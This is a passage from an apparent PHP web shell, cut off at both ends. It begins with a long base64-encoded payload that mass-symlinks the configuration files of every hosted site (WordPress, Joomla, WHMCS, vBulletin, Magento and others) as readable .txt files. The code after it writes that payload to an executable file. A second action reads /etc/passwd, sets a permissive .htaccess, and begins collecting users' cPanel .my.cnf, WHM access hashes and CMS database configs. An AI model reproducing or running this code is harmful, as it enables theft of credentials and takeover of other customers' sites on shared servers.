aHAnLCRzaXRlc3MuJy00LnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93cC93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy13cC50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL1dQL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLVdQLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd3AvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy13cC1iZXRhLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmV0YS93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AxMy1iZXRhLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJlc3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtcHJlc3MudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93b3JkcHJlc3Mvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtd29yZHByZXNzLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvV29yZHByZXNzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLVdvcmRwcmVzcy50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Jsb2cvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtV29yZHByZXNzLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvd29yZHByZXNzL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtd29yZHByZXNzLWJldGEudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXdzL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cDEzLW5ld3MudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwMTMtbmV3LnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmxvZy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtYmxvZy50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2JldGEvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwLWJldGEudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ibG9ncy93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtYmxvZ3MudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob21lL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1ob21lLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1wcm90YWwudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL3dwLWNvbmZpZy5waHAnLCRzaXRlc3MuJy13cC1zaXRlLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFpbi93cC1jb25maWcucGhwJywkc2l0ZXNzLictd3AtbWFpbi50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3Rlc3Qvd3AtY29uZmlnLnBocCcsJHNpdGVzcy4nLXdwLXRlc3QudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcmNhZGUvZnVuY3Rpb25zL2RiY2xhc3MucGhwJywkc2l0ZXNzLictaWJwcm9hcmNhZGUudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEyLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcHJvdGFsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXByb3RhbC50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2pvby9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvby50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Ntcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1jbXMudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zaXRlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLXNpdGUudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tYWluL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLW1haW4udHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXdzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictam9vbWxhLW5ld3MudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9uZXcvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEtbmV3LnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9tZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWpvb21sYS1ob21lLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLXZifmNvbmZpZy50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiMy9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdmIzfmNvbmZpZy50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NjL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy12YjF+Y29uZmlnLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaW5jbHVkZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLWluY2x1ZGVzLXZiLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vaW5jbHVkZXMvY2xhc3NfY29yZS5waHAnLCRzaXRlc3MuJy12Ymx1dHRpbn5jbGFzc19jb3JlLnBocC50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3ZiL2luY2x1ZGVzL2NsYXNzX2NvcmUucGhwJywkc2l0ZXNzLictdmJsdXR0aW5+Y2xhc3NfY29yZS5waHAxLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2MvaW5jbHVkZXMvY2xhc3NfY29yZS5waHAnLCRzaXRlc3MuJy12Ymx1dHRpbn5jbGFzc19jb3JlLnBocDIudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0xNS50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NlbnRyYWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tY2VudHJhbC50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS13aG1jcy50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobS9XSE1DUy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1XSE1DUy50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3dobWMvV0hNL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htYy1XSE0udHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG1jcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobWNzLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnQudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VwcC50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NlY3VyZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1Y3VyZS50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3NlY3VyZS93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1zdWN1cmUtd2htLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2VjdXJlL3dobWNzL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictc3VjdXJlLXdobWNzLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY3BhbmVsL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictY3BhbmVsLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1wYW5lbC50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1ob3N0LnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWhvc3RpbmcudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWhvc3RzLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1qb29tbGEudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdWJtaXR0aWNrZXQucGhwJywkc2l0ZXNzLictd2htY3MyLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudHMudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnQudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jbGllbnRlcy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudGVzLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY2xpZW50ZS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWNsaWVudC50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudHN1cHBvcnQvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy1jbGllbnRzdXBwb3J0LnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYmlsbGluZy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWJpbGxpbmcudHh0Jyk7ICBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvbWFuYWdlL2NvbmZpZ3VyYXRpb24ucGhwJywkc2l0ZXNzLictd2htLW1hbmFnZS50eHQnKTsgIHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teS9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXdobS1teS50eHQnKTsgIHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9teXNob3AvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0tbXlzaG9wLnR4dCcpOyAgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2Rpc3QtY29uZmlndXJlLnBocCcsJHNpdGVzcy4nLXplbmNhcnQudHh0Jyk7ICBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLXplbmNhcnQudHh0Jyk7ICBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2hvcC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRzaXRlc3MuJy1zaG9wLVpDc2hvcC50eHQnKTsgIHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYudHh0Jyk7ICBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc21mL1NldHRpbmdzLnBocCcsJHNpdGVzcy4nLXNtZjIudHh0Jyk7ICBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvZm9ydW0vU2V0dGluZ3MucGhwJywkc2l0ZXNzLictc21mLWZvcnVtLnR4dCcpOyAgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2ZvcnVtcy9TZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1zbWYtZm9ydW1zLnR4dCcpOyAgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcnRpY2xlL2NvbmZpZy5waHAnLCRzaXRlc3MuJy1Od2FoeS50eHQnKTsgIHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy91cC9pbmNsdWRlcy9jb25maWcucGhwJywkc2l0ZXNzLictdXAyLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvY29uZl9nbG9iYWwucGhwJywkc2l0ZXNzLictNi50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGUvZGIucGhwJywkc2l0ZXNzLictNy50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2Nvbm5lY3QucGhwJywkc2l0ZXNzLictUEhQLUZ1c2lvbi50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL21rX2NvbmYucGhwJywkc2l0ZXNzLictOS50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy10cmFpZG50MS50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmZpZy5waHAnLCRzaXRlc3MuJy00aW1hZ2VzLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2l0ZXMvZGVmYXVsdC9zZXR0aW5ncy5waHAnLCRzaXRlc3MuJy1EcnVwYWwudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9tZW1iZXIvY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy0xbWVtYmVyLnR4dCcpIDsgIHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLWJpbGxpbmdzLnR4dCcpIDsgIHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy93aG0vY29uZmlndXJhdGlvbi5waHAnLCRzaXRlc3MuJy13aG0udHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9jb25maWd1cmF0aW9uLnBocCcsJHNpdGVzcy4nLXN1cHBvcnRzLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvcmVxdWlyZXMvY29uZmlnLnBocCcsJHNpdGVzcy4nLUFNNFNTLWhvc3RpbmcudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0cy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1zdXBwb3J0cy50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NsaWVudC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1jbGllbnQudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9zdXBwb3J0L2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLXN1cHBvcnQudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5nL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWJpbGxpbmcudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9iaWxsaW5ncy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1iaWxsaW5ncy50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3QvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdC50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RzL2luY2x1ZGVzL2lzbzQyMTcucGhwJywkc2l0ZXNzLictaG9zdGJpbGxzLWhvc3RzLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0aW5nLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvaG9zdGluZ3MvaW5jbHVkZXMvaXNvNDIxNy5waHAnLCRzaXRlc3MuJy1ob3N0YmlsbHMtaG9zdGluZ3MudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2hvc3RiaWxscy9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0YmlsbHMudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9ob3N0YmlsbC9pbmNsdWRlcy9pc280MjE3LnBocCcsJHNpdGVzcy4nLWhvc3RiaWxscy1ob3N0YmlsbC50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2xva29tZWRpYS9jb25maWcva29uZWtzaS5waHAnLCRzaXRlc3MsJy1sb2tvbWVkaWEudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9jb25maWcva29uZWtzaS5waHAnLCRzaXRlc3MsJy1sb2tvbWVkaWEudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9wby1jb250ZW50L2NvbmZpZy5waHAnLCRzaXRlc3MsJy1wb3BvamkudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy92ZG9fY29uZmlnLnBocCcsJHNpdGVzcywnLVZvb2Rvby50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2J3X2NvbmZpZy9jb25maWcuaW5pJywkc2l0ZXNzLCctYm9zd2ViLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3MvYndfY29uZmlnL2NvbmZpZy5pbmknLCRzaXRlc3MsJy1ib3N3ZWIudHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcHAvZXRjL2xvY2FsLnhtbCcsJHNpdGVzcywnLW1hZ2VudG8udHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9hcHAvZXRjL2xvY2FsLnhtbCcsJHNpdGVzcywnLW1hZ2VudG8udHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9kYi9rb25la3NpLnBocCcsJHNpdGVzcywnLXVua25vd24udHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9kYXRhYi9rb25la3NpLnBocCcsJHNpdGVzcywnLXVua25vd24udHh0Jyk7IHN5bWxpbmsoJy92YXIvd3d3L3Zob3N0cy8nLiRzaXRlc3MuJy9odHRwZG9jcy9rb2ZpZ3VyYXNpL2tvbmVrc2kucGhwJywkc2l0ZXNzLCctdW5rbm93bi50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2NvbmYvY29uZi5waHAnLCRzaXRlc3MsJy11bmtub3duLnR4dCcpOyBzeW1saW5rKCcvdmFyL3d3dy92aG9zdHMvJy4kc2l0ZXNzLicvaHR0cGRvY3Mvc2V0ZGF0YWJhc2UucGhwJywkc2l0ZXNzLCctdW5rbm93bi50eHQnKTsgc3ltbGluaygnL3Zhci93d3cvdmhvc3RzLycuJHNpdGVzcy4nL2h0dHBkb2NzL2RiL3NldGRhdGFiYXNlLnBocCcsJHNpdGVzcywnLXVua25vd24udHh0Jyk7IH0gcHJpbnQgIjxicj48YnI+PGJyPjxhIGhyZWY9J3ByaXZfdmhvc3QvJyBzdHlsZT0nY29sb3I6IzAwRkZGRic+RG9uZSB8IENsaWNrIEhlcmUgITwvZm9udD4iOyA8L3N0cm9uZz48L3A+';
1026$file = fopen("pe.ler" ,"w+");
1027$write = fwrite ($file ,base64_decode($config));
1028fclose($file);
1029 chmod("pe.ler",0755);
1030 echo "<center><a href='priv_vhost/pe.ler'>Click Here !</a></center>";
1031} elseif($_GET['do'] == 'config') {
1032 $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
1033 $idx = mkdir("priv_config", 0777);
1034 $isi_htc = "Options all\nRequire None\nSatisfy Any";
1035 $htc = fopen("priv_config/.htaccess","w");
1036 fwrite($htc, $isi_htc);
1037 while($passwd = fgets($etc)) {
1038 if($passwd == "" || !$etc) {
1039 echo "<font color=red>Can't read /etc/passwd</font>";
1040 } else {
1041 preg_match_all('/(.*?):x:/', $passwd, $user_config);
1042 foreach($user_config[1] as $user_idx) {
1043 $user_config_dir = "/home/$user_idx/public_html/";
1044 if(is_readable($user_config_dir)) {
1045 $grab_config = array(
1046 "/home/$user_idx/.my.cnf" => "cpanel",
1047 "/home/$user_idx/.accesshash" => "WHM-accesshash",
1048 "/home/$user_idx/public_html/po-content/config.php" => "Popoji",
1049 "/home/$user_idx/public_html/vdo_config.php" => "Voodoo",
1050 "/home/$user_idx/public_html/bw-configs/config.ini" => "BosWeb",
1051 "/home/$user_idx/public_html/config/koneksi.php" => "Lokomedia",
1052 "/home/$user_idx/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
1053 "/home/$user_idx/public_html/clientarea/configuration.php" => "WHMCS",
1054 "/home/$user_idx/public_html/submitticket.php" => "WHMCS",
1055 "/home/$user_idx/public_html/whm/configuration.php" => "WHMCS",
1056 "/home/$user_idx/public_html/whmcs/configuration.php" => "WHMCS",
1057 "/home/$user_idx/public_html/WHMCS/configuration.php" => "WHMCS",
